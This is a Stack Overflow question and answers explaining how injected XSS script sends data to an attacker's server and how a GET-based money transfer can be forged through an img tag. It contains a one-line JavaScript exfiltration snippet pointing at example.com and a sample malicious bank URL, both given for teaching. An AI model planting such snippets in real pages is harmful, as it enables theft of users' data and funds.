0

I read How does XSS work? but I still don't get this point .

Scenario :

  1. I run mybank.com site and an end user logs in to the site .
  2. Someone "injects" malicious code by submitting a GET that gets printed or echoed back .
  3. As far as I know your requests always goes to mybank.com because of cross domain request's disallowed by default .
  4. So how do I actually manage to sent contents to mysite.com assuming mysite is a malicious user's site who wants to exploit mybank.com's XSS vulnerabilities ?

If I can't change point 3 , then probably there is no way I could do 4 . But if 4 can be done is it done by changing window.location.href or document.location i.e breaking assumption 3 ? Now it behaves like it is mysite.com ?

Or is there any other way you could hijack site without 4 ?

Community
  • 1
  • 1
Nishant
  • 20,354
  • 18
  • 69
  • 101

2 Answers2

2

Once the code gets injected, there is no "security", the browser thinks that all the code that is running on the site belongs there.

Think about what you can do in your own web pages when you code. You can have JavaScript click on buttons, submit forms, click links, etc. You can have the code inject elements, more code, remove things, etc.

So imagine what a developer can do to an email app or a bank account. They could send emails or transfer money. Just need to fire the right steps.

Now how can they transfer information out? As simple as making a GET or POST request. They set up an end point somewhere and make a request to it. The end point logs the data. Requests can be made with AJAX, images, form submissions, loading up ifrmaes, etc.

Cross Domain requests are allowed if the other domain you want to talk to allows it.

epascarello
  • 204,599
  • 20
  • 195
  • 236
  • If hypothetically Cross Domain requests are NOT allowed , then there is nothing you can do right ? Ofcourse achieving this might be hard but the question is a bit theoretical to understand what actually makes this possible . Send Emails or Transfer Money are good examples . Its basically someone else authorizing themselves as you and the dangers assosiated - one form of hacking . – Nishant Nov 26 '14 at 13:41
  • 1
    You can always make cross domain calls! That is how we link to images, CDNs for script/css files, submit forms to other domains, etc. Cross Domain means nothing with XSS. – epascarello Nov 26 '14 at 13:44
  • Correct ! I thought about this but somehow forced myself to think its not cross domain :-) while it really is . Just not via AJAX right ? – Nishant Nov 26 '14 at 13:45
  • 1
    `var img = document.createElement("img"); img.src="https://example.com/?data=12309821309812309812038213";` I just sent data to another domain with that call when it is run. If the person wants to use Ajax, they can just set up their server to allow cross domain calls. They do not have to worry about the "bank" site not allowing it since they are not making calls to the bank, the "bank" is making the requests. All cross domain is a handchake with CORS. It is a bouncer at a bar/club that either lets them in to read data or it denies entry. – epascarello Nov 26 '14 at 13:49
1

GET requests are simple requests you can make just by loading a URL. Suppose the vulnerable page allows you to send a money order to someone using a pure GET request like this:

http://bank.com/sendmoney?user=attacker&amount=everything

Just by navigating to the URL means you want to send all of your money to the attacker (lol)... Suppose the only security is that you must be logged into bank.com

Now suppose you visit this attacker's website while logged into bank.com and he has an img element with the src attribute set to that URL. Just by visiting the page you've sent all of your money to the attacker. That's it in a nutshell.

Usually XSS means you are able to actually inject code directly onto the page because of the logic used on the server-side echo's the contents of a GET-request variable directly onto the page without sanitizing the input. Hopefully this helps you understand a little better.

Jonathan Gray
  • 2,509
  • 15
  • 20